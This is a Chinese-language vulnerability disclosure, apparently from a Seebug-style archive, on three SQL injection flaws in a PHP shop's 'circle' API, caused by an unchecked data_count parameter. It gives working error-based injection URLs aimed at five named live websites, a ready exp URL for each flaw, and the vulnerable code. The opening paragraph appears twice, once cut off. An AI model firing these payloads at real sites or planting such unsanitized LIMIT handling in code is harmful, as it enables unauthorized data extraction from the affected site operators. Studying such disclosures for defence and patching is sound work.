VULHUB ™

### 简要描述： 直接出数据 ### 详细说明： 先来五个互联网实例 ``` http://www.0795hui.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ``` http://www.hfmy.cc/modules/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ``` http://sn.atmbux.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ``` http://www.wbshyw.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ``` http://o.yugongw.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` 注入#1 看到circle\control\api.php ``` public function get_theme_listOp() { $result = ''; $data_count = 2; if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) { $data_count =...

### 简要描述： 直接出数据 ### 详细说明： 先来五个互联网实例 ``` http://www.0795hui.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ``` http://www.hfmy.cc/modules/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ``` http://sn.atmbux.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ``` http://www.wbshyw.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ``` http://o.yugongw.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` 注入#1 看到circle\control\api.php ``` public function get_theme_listOp() { $result = ''; $data_count = 2; if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) { $data_count = $_GET['data_count']; } $model = Model(); $theme_list = $model->table('circle_theme')->field('*, is_recommend*rand()*10000 + has_affix*rand() as rand')->where(array('circle_status'=>1, 'is_closed'=>0))->where(array('has_affix'=>1))->order('rand desc')->limit($data_count)->select(); if(!empty($theme_list)){ $theme_list = array_under_reset($theme_list, 'theme_id'); $themeid_array = array_keys($theme_list); // 附件 $affix_list = $model->table('circle_affix')->where(array('theme_id'=>array('in', $themeid_array), 'affix_type'=>1))->group('theme_id')->select(); if(!empty($affix_list)) $affix_list = array_under_reset($affix_list, 'theme_id'); foreach ($theme_list as $key=>$val){ if(isset($affix_list[$val['theme_id']])) $theme_list[$key]['affix'] = themeImageUrl($affix_list[$val['theme_id']]['affix_filethumb']); } } if($this->data_type === 'json') { $result = json_encode($theme_list); } else { Tpl::output('theme_list', $theme_list); ob_start(); Tpl::showpage('api_theme_list', 'null_layout'); $result = ob_get_clean(); } $this->return_result($result); } ``` if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) { $data_count = $_GET['data_count']; } 这里存在很明显的逻辑错误，因为intval(1xxxx)=1,然后直接进入了limit没有单引号包裹。 造成注入。 exp为 ``` index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` 注入#2 ``` public function get_reply_themelistOp() { $result = ''; $data_count = 3; if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) { $data_count = $_GET['data_count']; //注入2 } $model = Model(); $reply_themelist = $model->table('circle_theme')->where(array('is_closed'=>0))->order('theme_commentcount desc')->limit($data_count)->select(); if($this->data_type === 'json') { $result = json_encode($reply_themelist); } else { Tpl::output('reply_themelist', $reply_themelist); ob_start(); Tpl::showpage('api_reply_themelist', 'null_layout'); $result = ob_get_clean(); } $this->return_result($result); } ``` exp为 ``` <code>index.php?act=api&op=get_reply_themelist&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` 注入#3 ``` public function get_more_memberthemeOp(){ $result = ''; $data_count = 4; if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) { $data_count = $_GET['data_count']; //注入3 } $model = Model(); $more_membertheme = $model->table('circle_member,circle_theme')->field('circle_member.*,circle_theme.*, circle_member.is_recommend*10000*rand()+(circle_member.cm_thcount)/10000 as rand') ->order('rand desc') ->join('inner')->on('circle_member.member_id = circle_theme.member_id and circle_member.circle_id = circle_theme.circle_id') ->group('circle_member.member_id,circle_member.circle_id')->limit($data_count)->select(); if($this->data_type === 'json') { $result = json_encode($more_membertheme); } else { Tpl::output("more_membertheme", $more_membertheme); ob_start(); Tpl::showpage('api_more_membertheme', 'null_layout'); $result = ob_get_clean(); $this->return_result($result); } } ``` exp为 ``` index.php?act=api&op=get_more_membertheme&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ### 漏洞证明： [<img src="https://images.seebug.org/upload/201507/082258252e0d49d1cd139ff4c9f88ad0337d6eda.png" alt="QQ截图20150708225544.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/082258252e0d49d1cd139ff4c9f88ad0337d6eda.png)